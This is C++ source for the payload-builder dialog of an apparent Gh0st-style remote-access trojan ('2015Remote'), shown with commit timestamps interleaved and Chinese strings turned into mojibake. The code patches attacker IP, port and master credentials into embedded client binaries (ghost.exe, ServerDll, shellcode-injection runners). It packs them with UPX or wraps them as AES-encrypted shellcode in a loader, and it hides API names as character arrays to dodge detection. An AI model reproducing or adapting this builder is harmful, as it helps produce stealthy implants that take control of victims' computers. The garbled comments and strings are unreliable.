2019-01-05 20:21:43 +08:00
|
|
|
|
// BuildDlg.cpp : ʵ<><CAB5><EFBFBD>ļ<EFBFBD>
|
|
|
|
|
|
//
|
|
|
|
|
|
|
|
|
|
|
|
#include "stdafx.h"
|
|
|
|
|
|
#include "2015Remote.h"
|
|
|
|
|
|
#include "BuildDlg.h"
|
|
|
|
|
|
#include "afxdialogex.h"
|
|
|
|
|
|
#include <io.h>
|
2025-08-29 06:57:59 +08:00
|
|
|
|
#include "InputDlg.h"
|
2025-09-01 12:29:52 +08:00
|
|
|
|
#include <bcrypt.h>
|
|
|
|
|
|
#include <wincrypt.h>
|
|
|
|
|
|
#include <ntstatus.h>
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
2025-04-28 16:08:16 +08:00
|
|
|
|
enum Index
|
|
|
|
|
|
{
|
|
|
|
|
|
IndexTestRun_DLL,
|
|
|
|
|
|
IndexTestRun_MemDLL,
|
|
|
|
|
|
IndexTestRun_InjSC,
|
|
|
|
|
|
IndexGhost,
|
|
|
|
|
|
IndexServerDll,
|
|
|
|
|
|
OTHER_ITEM
|
|
|
|
|
|
};
|
2025-04-07 18:18:36 +08:00
|
|
|
|
|
2019-01-05 20:21:43 +08:00
|
|
|
|
// CBuildDlg <20>Ի<EFBFBD><D4BB><EFBFBD>
|
|
|
|
|
|
|
|
|
|
|
|
IMPLEMENT_DYNAMIC(CBuildDlg, CDialog)
|
|
|
|
|
|
|
2025-04-28 16:08:16 +08:00
|
|
|
|
std::string GetMasterId();
|
|
|
|
|
|
|
2025-07-19 16:18:56 +08:00
|
|
|
|
std::string GetPwdHash();
|
|
|
|
|
|
|
2019-01-05 20:21:43 +08:00
|
|
|
|
int MemoryFind(const char *szBuffer, const char *Key, int iBufferSize, int iKeySize);
|
|
|
|
|
|
|
2025-04-28 16:08:16 +08:00
|
|
|
|
LPBYTE ReadResource(int resourceId, DWORD &dwSize) {
|
|
|
|
|
|
dwSize = 0;
|
|
|
|
|
|
auto id = resourceId;
|
|
|
|
|
|
HRSRC hResource = FindResourceA(NULL, MAKEINTRESOURCE(id), "BINARY");
|
|
|
|
|
|
if (hResource == NULL) {
|
|
|
|
|
|
return NULL;
|
|
|
|
|
|
}
|
|
|
|
|
|
// <20><>ȡ<EFBFBD><C8A1>Դ<EFBFBD>Ĵ<EFBFBD>С
|
|
|
|
|
|
dwSize = SizeofResource(NULL, hResource);
|
|
|
|
|
|
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Դ
|
|
|
|
|
|
HGLOBAL hLoadedResource = LoadResource(NULL, hResource);
|
|
|
|
|
|
if (hLoadedResource == NULL) {
|
|
|
|
|
|
return NULL;
|
|
|
|
|
|
}
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Դ<EFBFBD><D4B4><EFBFBD><EFBFBD>ȡָ<C8A1><D6B8><EFBFBD><EFBFBD>Դ<EFBFBD><D4B4><EFBFBD>ݵ<EFBFBD>ָ<EFBFBD><D6B8>
|
|
|
|
|
|
LPVOID pData = LockResource(hLoadedResource);
|
|
|
|
|
|
if (pData == NULL) {
|
|
|
|
|
|
return NULL;
|
|
|
|
|
|
}
|
|
|
|
|
|
auto r = new BYTE[dwSize];
|
|
|
|
|
|
memcpy(r, pData, dwSize);
|
|
|
|
|
|
|
|
|
|
|
|
return r;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
2019-01-05 20:21:43 +08:00
|
|
|
|
CBuildDlg::CBuildDlg(CWnd* pParent)
|
|
|
|
|
|
: CDialog(CBuildDlg::IDD, pParent)
|
|
|
|
|
|
, m_strIP(_T(""))
|
|
|
|
|
|
, m_strPort(_T(""))
|
2025-08-29 06:57:59 +08:00
|
|
|
|
, m_strFindden(FLAG_FINDEN)
|
2019-01-05 20:21:43 +08:00
|
|
|
|
{
|
|
|
|
|
|
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
CBuildDlg::~CBuildDlg()
|
|
|
|
|
|
{
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
void CBuildDlg::DoDataExchange(CDataExchange* pDX)
|
|
|
|
|
|
{
|
|
|
|
|
|
CDialog::DoDataExchange(pDX);
|
|
|
|
|
|
DDX_Text(pDX, IDC_EDIT_IP, m_strIP);
|
|
|
|
|
|
DDX_Text(pDX, IDC_EDIT_PORT, m_strPort);
|
2024-12-28 18:35:34 +08:00
|
|
|
|
DDX_Control(pDX, IDC_COMBO_EXE, m_ComboExe);
|
2025-04-07 18:18:36 +08:00
|
|
|
|
DDX_Control(pDX, IDC_STATIC_OTHER_ITEM, m_OtherItem);
|
2025-04-28 16:08:16 +08:00
|
|
|
|
DDX_Control(pDX, IDC_COMBO_BITS, m_ComboBits);
|
2025-06-15 04:55:14 +08:00
|
|
|
|
DDX_Control(pDX, IDC_COMBO_RUNTYPE, m_ComboRunType);
|
2025-07-03 04:30:25 +08:00
|
|
|
|
DDX_Control(pDX, IDC_COMBO_PROTO, m_ComboProto);
|
2025-07-13 03:55:33 +08:00
|
|
|
|
DDX_Control(pDX, IDC_COMBO_ENCRYPT, m_ComboEncrypt);
|
2025-08-10 03:04:13 +08:00
|
|
|
|
DDX_Control(pDX, IDC_COMBO_COMPRESS, m_ComboCompress);
|
2019-01-05 20:21:43 +08:00
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
BEGIN_MESSAGE_MAP(CBuildDlg, CDialog)
|
|
|
|
|
|
ON_BN_CLICKED(IDOK, &CBuildDlg::OnBnClickedOk)
|
2025-04-07 18:18:36 +08:00
|
|
|
|
ON_CBN_SELCHANGE(IDC_COMBO_EXE, &CBuildDlg::OnCbnSelchangeComboExe)
|
2025-07-13 03:55:33 +08:00
|
|
|
|
ON_COMMAND(ID_HELP_PARAMETERS, &CBuildDlg::OnHelpParameters)
|
2025-08-29 06:57:59 +08:00
|
|
|
|
ON_COMMAND(ID_HELP_FINDDEN, &CBuildDlg::OnHelpFindden)
|
2019-01-05 20:21:43 +08:00
|
|
|
|
END_MESSAGE_MAP()
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
|
// CBuildDlg <20><>Ϣ<EFBFBD><CFA2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|
|
|
|
|
|
2025-08-10 03:04:13 +08:00
|
|
|
|
std::string ReleaseUPX();
|
|
|
|
|
|
void run_upx_async(HWND hwnd, const std::string& upx, const std::string& file, bool isCompress);
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
2025-09-01 12:29:52 +08:00
|
|
|
|
bool MakeShellcode(LPBYTE& compressedBuffer, int& ulTotalSize, LPBYTE originBuffer,
|
|
|
|
|
|
int ulOriginalLength, bool align = false);
|
|
|
|
|
|
|
|
|
|
|
|
BOOL WriteBinaryToFile(const char* path, const char* data, ULONGLONG size);
|
|
|
|
|
|
|
|
|
|
|
|
typedef struct SCInfo
|
|
|
|
|
|
{
|
|
|
|
|
|
unsigned char aes_key[16];
|
|
|
|
|
|
unsigned char aes_iv[16];
|
|
|
|
|
|
unsigned char data[4 * 1024 * 1024];
|
|
|
|
|
|
int len;
|
|
|
|
|
|
}SCInfo;
|
|
|
|
|
|
|
|
|
|
|
|
#define GetAddr(mod, name) GetProcAddress(GetModuleHandleA(mod), name)
|
|
|
|
|
|
|
|
|
|
|
|
bool MYLoadLibrary(const char* name) {
|
|
|
|
|
|
char kernel[] = { 'k','e','r','n','e','l','3','2',0 };
|
|
|
|
|
|
char load[] = { 'L','o','a','d','L','i','b','r','a','r','y','A',0 };
|
|
|
|
|
|
typedef HMODULE(WINAPI* LoadLibraryF)(LPCSTR lpLibFileName);
|
|
|
|
|
|
if (!GetModuleHandleA(name)) {
|
|
|
|
|
|
LoadLibraryF LoadLibraryA = (LoadLibraryF)GetAddr(kernel, load);
|
|
|
|
|
|
return LoadLibraryA(name);
|
|
|
|
|
|
}
|
|
|
|
|
|
return true;
|
|
|
|
|
|
}
|
|
|
|
|
|
|
|
|
|
|
|
void generate_random_iv(unsigned char* iv, size_t len) {
|
|
|
|
|
|
typedef HMODULE(WINAPI* LoadLibraryF)(LPCSTR lpLibFileName);
|
|
|
|
|
|
typedef NTSTATUS(WINAPI* BCryptGenRandomF)(BCRYPT_ALG_HANDLE, PUCHAR, ULONG, ULONG);
|
|
|
|
|
|
char crypt[] = { 'b','c','r','y','p','t',0 };
|
|
|
|
|
|
char name[] = { 'B','C','r','y','p','t','G','e','n','R','a','n','d','o','m',0 };
|
|
|
|
|
|
MYLoadLibrary(crypt);
|
|
|
|
|
|
BCryptGenRandomF BCryptGenRandom = (BCryptGenRandomF)GetAddr(crypt, name);
|
|
|
|
|
|
BCryptGenRandom(NULL, iv, len, BCRYPT_USE_SYSTEM_PREFERRED_RNG);
|
|
|
|
|
|
}
|
|
|
|
|
|
|
2019-01-05 20:21:43 +08:00
|
|
|
|
void CBuildDlg::OnBnClickedOk()
|
|
|
|
|
|
{
|
|
|
|
|
|
UpdateData(TRUE);
|
2025-04-28 16:08:16 +08:00
|
|
|
|
if (m_strIP.IsEmpty() || atoi(m_strPort) <= 0)
|
|
|
|
|
|
return;
|
|
|
|
|
|
|
|
|
|
|
|
BYTE* szBuffer = NULL;
|
|
|
|
|
|
DWORD dwFileSize = 0;
|
2025-04-07 18:18:36 +08:00
|
|
|
|
int index = m_ComboExe.GetCurSel(), typ=index;
|
2025-04-28 16:08:16 +08:00
|
|
|
|
int is64bit = m_ComboBits.GetCurSel() == 0;
|
|
|
|
|
|
if (index == IndexTestRun_InjSC && !is64bit) {
|
|
|
|
|
|
MessageBox("Shellcode ֻ<><D6BB><EFBFBD><EFBFBD>64λ<34><CEBB><EFBFBD>±<EFBFBD>ע<EFBFBD>룬ע<EBA3AC><D7A2><EFBFBD><EFBFBD>Ҳֻ<D2B2><D6BB><EFBFBD><EFBFBD>64λ!", "<EFBFBD><EFBFBD>ʾ", MB_ICONWARNING);
|
|
|
|
|
|
return;
|
|
|
|
|
|
}
|
|
|
|
|
|
int startup = Startup_DLL;
|
2024-12-29 20:47:14 +08:00
|
|
|
|
CString file;
|
|
|
|
|
|
switch (index)
|
|
|
|
|
|
{
|
2025-04-28 16:08:16 +08:00
|
|
|
|
case IndexTestRun_DLL: case IndexTestRun_MemDLL: case IndexTestRun_InjSC:
|
2024-12-29 20:47:14 +08:00
|
|
|
|
file = "TestRun.exe";
|
2025-04-28 16:08:16 +08:00
|
|
|
|
typ = index == IndexTestRun_DLL ? CLIENT_TYPE_DLL : CLIENT_TYPE_MEMDLL;
|
|
|
|
|
|
startup = std::map<int, int>{
|
|
|
|
|
|
{IndexTestRun_DLL, Startup_DLL},{IndexTestRun_MemDLL, Startup_MEMDLL},{IndexTestRun_InjSC, Startup_InjSC},
|
|
|
|
|
|
}[index];
|
|
|
|
|
|
szBuffer = ReadResource(is64bit ? IDR_TESTRUN_X64 : IDR_TESTRUN_X86, dwFileSize);
|
2024-12-29 20:47:14 +08:00
|
|
|
|
break;
|
2025-04-28 16:08:16 +08:00
|
|
|
|
case IndexGhost:
|
2024-12-29 20:47:14 +08:00
|
|
|
|
file = "ghost.exe";
|
2025-04-28 16:08:16 +08:00
|
|
|
|
typ = CLIENT_TYPE_ONE;
|
|
|
|
|
|
szBuffer = ReadResource(is64bit ? IDR_GHOST_X64 : IDR_GHOST_X86, dwFileSize);
|
2024-12-29 20:47:14 +08:00
|
|
|
|
break;
|
2025-04-28 16:08:16 +08:00
|
|
|
|
case IndexServerDll:
|
2024-12-29 20:47:14 +08:00
|
|
|
|
file = "ServerDll.dll";
|
2025-04-28 16:08:16 +08:00
|
|
|
|
typ = CLIENT_TYPE_DLL;
|
|
|
|
|
|
szBuffer = ReadResource(is64bit ? IDR_SERVERDLL_X64 : IDR_SERVERDLL_X86, dwFileSize);
|
2024-12-29 20:47:14 +08:00
|
|
|
|
break;
|
2025-04-28 16:08:16 +08:00
|
|
|
|
case OTHER_ITEM: {
|
2025-04-07 18:18:36 +08:00
|
|
|
|
m_OtherItem.GetWindowTextA(file);
|
|
|
|
|
|
typ = -1;
|
2025-04-28 16:08:16 +08:00
|
|
|
|
if (file != "δѡ<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>") {
|
|
|
|
|
|
CFile File;
|
|
|
|
|
|
File.Open(file, CFile::modeRead | CFile::typeBinary);
|
|
|
|
|
|
dwFileSize = File.GetLength();
|
|
|
|
|
|
if (dwFileSize > 0) {
|
|
|
|
|
|
szBuffer = new BYTE[dwFileSize];
|
|
|
|
|
|
File.Read(szBuffer, dwFileSize);
|
|
|
|
|
|
}
|
|
|
|
|
|
File.Close();
|
|
|
|
|
|
}
|
|
|
|
|
|
break;
|
|
|
|
|
|
}
|
2024-12-29 20:47:14 +08:00
|
|
|
|
default:
|
|
|
|
|
|
break;
|
|
|
|
|
|
}
|
2025-04-28 16:08:16 +08:00
|
|
|
|
if (szBuffer == NULL)
|
2024-12-28 18:35:34 +08:00
|
|
|
|
{
|
2025-04-28 16:08:16 +08:00
|
|
|
|
MessageBox("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڲ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>룬<EFBFBD><EFBFBD><EFBFBD>±<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>!", "<EFBFBD><EFBFBD>ʾ", MB_ICONWARNING);
|
|
|
|
|
|
return;
|
2024-12-28 18:35:34 +08:00
|
|
|
|
}
|
2019-01-05 20:21:43 +08:00
|
|
|
|
//////////<2F><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϣ//////////////////////
|
2025-07-10 04:29:40 +08:00
|
|
|
|
CONNECT_ADDRESS g_ConnectAddress = { FLAG_FINDEN, "127.0.0.1", "", typ, false, DLL_VERSION, 0, startup, HeaderEncV0 };
|
2025-08-29 06:57:59 +08:00
|
|
|
|
if(m_strFindden.GetLength())
|
|
|
|
|
|
memcpy(g_ConnectAddress.szFlag, m_strFindden.GetBuffer(), min(sizeof(g_ConnectAddress.szFlag), m_strFindden.GetLength()));
|
2025-07-13 04:37:14 +08:00
|
|
|
|
g_ConnectAddress.SetAdminId(GetMasterHash().c_str());
|
2024-12-29 01:09:06 +08:00
|
|
|
|
g_ConnectAddress.SetServer(m_strIP, atoi(m_strPort));
|
2025-06-15 04:55:14 +08:00
|
|
|
|
g_ConnectAddress.runningType = m_ComboRunType.GetCurSel();
|
2025-07-03 04:30:25 +08:00
|
|
|
|
g_ConnectAddress.protoType = m_ComboProto.GetCurSel();
|
2025-07-13 03:55:33 +08:00
|
|
|
|
g_ConnectAddress.iHeaderEnc = m_ComboEncrypt.GetCurSel();
|
2025-07-19 16:18:56 +08:00
|
|
|
|
memcpy(g_ConnectAddress.pwdHash, GetPwdHash().c_str(), sizeof(g_ConnectAddress.pwdHash));
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
2025-04-28 16:08:16 +08:00
|
|
|
|
if (!g_ConnectAddress.IsValid()) {
|
|
|
|
|
|
SAFE_DELETE_ARRAY(szBuffer);
|
2019-01-05 20:21:43 +08:00
|
|
|
|
return;
|
2025-04-28 16:08:16 +08:00
|
|
|
|
}
|
2025-06-21 14:27:21 +08:00
|
|
|
|
if (startup != Startup_InjSC)
|
|
|
|
|
|
g_ConnectAddress.Encrypt();
|
2019-01-05 20:21:43 +08:00
|
|
|
|
try
|
|
|
|
|
|
{
|
2025-04-28 16:08:16 +08:00
|
|
|
|
// <20><><EFBFBD>±<EFBFBD>ʶ
|
|
|
|
|
|
char* ptr = (char*)szBuffer, *end = (char*)szBuffer + dwFileSize;
|
|
|
|
|
|
bool bFind = false;
|
|
|
|
|
|
int bufSize = dwFileSize;
|
|
|
|
|
|
while (ptr < end) {
|
|
|
|
|
|
int iOffset = MemoryFind(ptr, (char*)g_ConnectAddress.Flag(), bufSize, g_ConnectAddress.FlagLen());
|
|
|
|
|
|
if (iOffset == -1)
|
|
|
|
|
|
break;
|
2019-01-05 20:21:43 +08:00
|
|
|
|
|
2025-04-28 16:08:16 +08:00
|
|
|
|
CONNECT_ADDRESS* dst = (CONNECT_ADDRESS*)(ptr + iOffset);
|
|
|
|
|
|
auto result = strlen(dst->szBuildDate) ? compareDates(dst->szBuildDate, g_ConnectAddress.szBuildDate) : -1;
|
2025-06-01 15:31:04 +08:00
|
|
|
|
if (result > 0) {
|
|
|
|
|
|
MessageBox("<EFBFBD>ͻ<EFBFBD><EFBFBD>˰汾<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>س<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><EFBFBD><DEB7><EFBFBD><EFBFBD><EFBFBD>!\r\n" + file, "<EFBFBD><EFBFBD>ʾ", MB_ICONWARNING);
|
|
|
|
|
|
return;
|
|
|
|
|
|
}
|
2025-04-28 16:08:16 +08:00
|
|
|
|
if (result != -2 && result <= 0)// <20>ͻ<EFBFBD><CDBB>˰汾<CBB0><E6B1BE><EFBFBD>ܲ<EFBFBD><DCB2><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ض<EFBFBD>
|
|
|
|
|
|
{
|
|
|
|
|
|
bFind = true;
|
|
|
|
|
|
auto master = GetMasterId();
|
|
|
|
|
|
memcpy(ptr + iOffset, &(g_ConnectAddress.ModifyFlag(master.c_str())), sizeof(g_ConnectAddress));
|
|
|
|
|
|
}
|
|
|
|
|
|
ptr += iOffset + sizeof(g_ConnectAddress);
|
|
|
|
|
|
bufSize -= iOffset + sizeof(g_ConnectAddress);
|
2019-01-05 20:21:43 +08:00
|
|
|
|
}
|
2025-04-28 16:08:16 +08:00
|
|
|
|
if (!bFind) {
|
|
|
|
|
|
MessageBox("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ڲ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>δ<EFBFBD><EFBFBD><EFBFBD>ҵ<EFBFBD><EFBFBD><EFBFBD>ʶ<EFBFBD><EFBFBD>Ϣ!\r\n" + file, "<EFBFBD><EFBFBD>ʾ", MB_ICONWARNING);
|
|
|
|
|
|
SAFE_DELETE_ARRAY(szBuffer);
|
2024-12-28 18:35:34 +08:00
|
|
|
|
return;
|
|
|
|
|
|
}
|
2025-04-28 16:08:16 +08:00
|
|
|
|
|
|
|
|
|
|
// <20><><EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>
|
|
|
|
|
|
char path[_MAX_PATH], * p = path;
|
|
|
|
|
|
GetModuleFileNameA(NULL, path, sizeof(path));
|
|
|
|
|
|
while (*p) ++p;
|
|
|
|
|
|
while ('\\' != *p) --p;
|
|
|
|
|
|
strcpy(p + 1, file.GetString());
|
|
|
|
|
|
|
|
|
|
|
|
CString strSeverFile = typ != -1 ? path : file;
|
2025-04-07 18:18:36 +08:00
|
|
|
|
DeleteFileA(strSeverFile);
|
2025-04-28 16:08:16 +08:00
|
|
|
|
CFile File;
|
2024-12-28 18:35:34 +08:00
|
|
|
|
BOOL r=File.Open(strSeverFile,CFile::typeBinary|CFile::modeCreate|CFile::modeWrite);
|
|
|
|
|
|
if (!r) {
|
2025-04-28 16:08:16 +08:00
|
|
|
|
MessageBox("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ʧ<EFBFBD><EFBFBD>!\r\n" + strSeverFile, "<EFBFBD><EFBFBD>ʾ", MB_ICONWARNING);
|
|
|
|
|
|
SAFE_DELETE_ARRAY(szBuffer);
|
|
|
|
|
|
return;
|
2024-12-28 18:35:34 +08:00
|
|
|
|
}
|
2025-01-01 04:54:27 +08:00
|
|
|
|
File.Write(szBuffer, dwFileSize);
|
2019-01-05 20:21:43 +08:00
|
|
|
|
File.Close();
|
2025-06-21 14:27:21 +08:00
|
|
|
|
CString tip = index == IndexTestRun_DLL ? "\r\n<EFBFBD><EFBFBD>ʾ: <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>\"ServerDll.dll\"<EFBFBD><EFBFBD><EFBFBD>Ա<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>С<EFBFBD>" : "";
|
2025-07-20 18:49:49 +08:00
|
|
|
|
tip += g_ConnectAddress.protoType==PROTO_KCP ? "\n<EFBFBD><EFBFBD>ʾ: ʹ<><CAB9>KCPЭ<50><D0AD><EFBFBD><EFBFBD><EFBFBD>ɷ<EFBFBD><C9B7><EFBFBD><F1A3ACB1><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>UDPЭ<50><D0AD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ϊ1<CEAA><31>" : "";
|
2025-08-10 03:04:13 +08:00
|
|
|
|
std::string upx;
|
|
|
|
|
|
if(m_ComboCompress.GetCurSel() == CLIENT_COMPRESS_UPX) upx = ReleaseUPX();
|
|
|
|
|
|
if (!upx.empty())
|
|
|
|
|
|
{
|
|
|
|
|
|
run_upx_async(GetParent()->GetSafeHwnd(), upx, strSeverFile.GetString(), true);
|
|
|
|
|
|
MessageBox("<EFBFBD><EFBFBD><EFBFBD><EFBFBD>UPXѹ<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>ע<EFBFBD><EFBFBD>Ϣ<EFBFBD><EFBFBD>ʾ<EFBFBD><EFBFBD>\r\n<EFBFBD>ļ<EFBFBD>λ<EFBFBD><EFBFBD>: " + strSeverFile + tip, "<EFBFBD><EFBFBD>ʾ", MB_ICONINFORMATION);
|
2025-09-01 12:29:52 +08:00
|
|
|
|
} else {
|
|
|
|
|
|
if (m_ComboCompress.GetCurSel() == CLIENT_COMPRESS_SC) {
|
|
|
|
|
|
DWORD dwSize = 0;
|
|
|
|
|
|
LPBYTE data = ReadResource(is64bit ? IDR_SCLOADER_X64 : IDR_SCLOADER_X86, dwSize);
|
|
|
|
|
|
if (data) {
|
|
|
|
|
|
int iOffset = MemoryFind((char*)data, (char*)g_ConnectAddress.Flag(), dwSize, g_ConnectAddress.FlagLen());
|
|
|
|
|
|
if (iOffset != -1) {
|
|
|
|
|
|
SCInfo* sc = (SCInfo*)(data + iOffset);
|
|
|
|
|
|
LPBYTE srcData = (LPBYTE)szBuffer;
|
|
|
|
|
|
int srcLen = dwFileSize;
|
|
|
|
|
|
if (MakeShellcode(srcData, srcLen, (LPBYTE)szBuffer, dwFileSize, true)) {
|
|
|
|
|
|
generate_random_iv(sc->aes_key, 16);
|
|
|
|
|
|
generate_random_iv(sc->aes_iv, 16);
|
|
|
|
|
|
std::string key, iv;
|
|
|
|
|
|
for (int i = 0; i < 16; ++i) key += std::to_string(sc->aes_key[i]) + " ";
|
|
|
|
|
|
for (int i = 0; i < 16; ++i) iv += std::to_string(sc->aes_iv[i]) + " ";
|
|
|
|
|
|
Mprintf("AES_KEY: %s, AES_IV: %s\n", key.c_str(), iv.c_str());
|
|
|
|
|
|
|
|
|
|
|
|
struct AES_ctx ctx;
|
|
|
|
|
|
AES_init_ctx_iv(&ctx, sc->aes_key, sc->aes_iv);
|
|
|
|
|
|
AES_CBC_encrypt_buffer(&ctx, srcData, srcLen);
|
|
|
|
|
|
if (srcLen <= 4 * 1024 * 1024) {
|
|
|
|
|
|
memcpy(sc->data, srcData, srcLen);
|
|
|
|
|
|
sc->len = srcLen;
|
|
|
|
|
|
}
|
|
|
|
|
|
SAFE_DELETE_ARRAY(srcData);
|
|
|
|
|
|
PathRenameExtension(strSeverFile.GetBuffer(MAX_PATH), _T(".exe"));
|
|
|
|
|
|
strSeverFile.ReleaseBuffer();
|
|
|
|
|
|
BOOL r = WriteBinaryToFile(strSeverFile.GetString(), (char*)data, dwSize);
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
}
|
|
|
|
|
|
SAFE_DELETE_ARRAY(data);
|
|
|
|
|
|
}
|
|
|
|
|
|
MessageBox("<EFBFBD><EFBFBD><EFBFBD>ɳɹ<EFBFBD>! <20>ļ<EFBFBD>λ<EFBFBD><CEBB>:\r\n" + strSeverFile + tip, "<EFBFBD><EFBFBD>ʾ", MB_ICONINFORMATION);
|
|
|
|
|
|
}
|
2025-04-28 16:08:16 +08:00
|
|
|
|
SAFE_DELETE_ARRAY(szBuffer);
|
|
|
|
|
|
if (index == IndexTestRun_DLL) return;
|
2019-01-05 20:21:43 +08:00
|
|
|
|
}
|
|
|
|
|
|
catch (CMemoryException* e)
|
|
|
|
|
|
{
|
2025-04-28 16:08:16 +08:00
|
|
|
|
char err[100];
|
|
|
|
|
|
e->GetErrorMessage(err, sizeof(err));
|
|
|
|
|
|
MessageBox("<EFBFBD>ڴ<EFBFBD><EFBFBD>쳣:" + CString(err), "<EFBFBD>쳣", MB_ICONERROR);
|
2019-01-05 20:21:43 +08:00
|
|
|
|
}
|
|
|
|
|
|
catch (CFileException* e)
|
|
|
|
|
|
{
|
2025-04-28 16:08:16 +08:00
|
|
|
|
char err[100];
|
|
|
|
|
|
e->GetErrorMessage(err, sizeof(err));
|
|
|
|
|
|
MessageBox("<EFBFBD>ļ<EFBFBD><EFBFBD>쳣:" + CString(err), "<EFBFBD>쳣", MB_ICONERROR);
|
2019-01-05 20:21:43 +08:00
|
|
|
|
}
|
|
|
|
|
|
catch (CException* e)
|
|
|
|
|
|
{
|
2025-04-28 16:08:16 +08:00
|
|
|
|
char err[100];
|
|
|
|
|
|
e->GetErrorMessage(err, sizeof(err));
|
|
|
|
|
|
MessageBox("<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>쳣:" + CString(err), "<EFBFBD>쳣", MB_ICONERROR);
|
2019-01-05 20:21:43 +08:00
|
|
|
|
}
|
|
|
|
|
|
|
2025-04-28 16:08:16 +08:00
|
|
|
|
SAFE_DELETE_ARRAY(szBuffer);
|
|
|
|
|
|
CDialog::OnOK();
|
2019-01-05 20:21:43 +08:00
|
|
|
|
}
|
2024-12-28 18:35:34 +08:00
|
|
|
|
|
|
|
|
|
|
BOOL CBuildDlg::OnInitDialog()
|
|
|
|
|
|
{
|
|
|
|
|
|
CDialog::OnInitDialog();
|
|
|
|
|
|
|
|
|
|
|
|
// TODO: <20>ڴ<EFBFBD><DAB4><EFBFBD><EFBFBD>Ӷ<EFBFBD><D3B6><EFBFBD><EFBFBD>ij<EFBFBD>ʼ<EFBFBD><CABC>
|
2025-06-15 04:55:14 +08:00
|
|
|
|
CEdit* pEdit = (CEdit*)GetDlgItem(IDC_EDIT_IP);
|
|
|
|
|
|
pEdit->LimitText(99);
|
2025-04-28 16:08:16 +08:00
|
|
|
|
m_ComboExe.InsertString(IndexTestRun_DLL, "TestRun - <20><><EFBFBD><EFBFBD>DLL");
|
|
|
|
|
|
m_ComboExe.InsertString(IndexTestRun_MemDLL, "TestRun - <20>ڴ<EFBFBD>DLL");
|
|
|
|
|
|
m_ComboExe.InsertString(IndexTestRun_InjSC, "TestRun - ע<><D7A2><EFBFBD><EFBFBD><EFBFBD>±<EFBFBD>");
|
|
|
|
|
|
|
|
|
|
|
|
m_ComboExe.InsertString(IndexGhost, "ghost.exe");
|
|
|
|
|
|
m_ComboExe.InsertString(IndexServerDll, "ServerDll.dll");
|
2025-04-07 18:18:36 +08:00
|
|
|
|
m_ComboExe.InsertString(OTHER_ITEM, CString("ѡ<EFBFBD><EFBFBD><EFBFBD>ļ<EFBFBD>"));
|
2025-07-21 04:34:48 +08:00
|
|
|
|
m_ComboExe.SetCurSel(IndexTestRun_MemDLL);
|
2024-12-28 18:35:34 +08:00
|
|
|
|
|
2025-04-28 16:08:16 +08:00
|
|
|
|
m_ComboBits.InsertString(0, "64λ");
|
|
|
|
|
|
m_ComboBits.InsertString(1, "32λ");
|
|
|
|
|
|
m_ComboBits.SetCurSel(0);
|
|
|
|
|
|
|
2025-06-15 04:55:14 +08:00
|
|
|
|
m_ComboRunType.InsertString(RUNNING_RANDOM, "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
|
|
|
|
|
|
m_ComboRunType.InsertString(RUNNING_PARALLEL, "<EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
|
|
|
|
|
|
m_ComboRunType.SetCurSel(RUNNING_RANDOM);
|
|
|
|
|
|
|
2025-07-03 04:30:25 +08:00
|
|
|
|
m_ComboProto.InsertString(PROTO_TCP, "TCP");
|
|
|
|
|
|
m_ComboProto.InsertString(PROTO_UDP, "UDP");
|
2025-07-12 20:27:14 +08:00
|
|
|
|
m_ComboProto.InsertString(PROTO_HTTP, "HTTP");
|
2025-07-20 18:49:49 +08:00
|
|
|
|
m_ComboProto.InsertString(PROTO_RANDOM, "<EFBFBD><EFBFBD><EFBFBD><EFBFBD>");
|
2025-07-20 04:42:29 +08:00
|
|
|
|
m_ComboProto.InsertString(PROTO_KCP, "KCP");
|
2025-07-03 04:30:25 +08:00
|
|
|
|
m_ComboProto.SetCurSel(PROTO_TCP);
|
|
|
|
|
|
|
2025-07-13 03:55:33 +08:00
|
|
|
|
m_ComboEncrypt.InsertString(PROTOCOL_SHINE, "Shine");
|
|
|
|
|
|
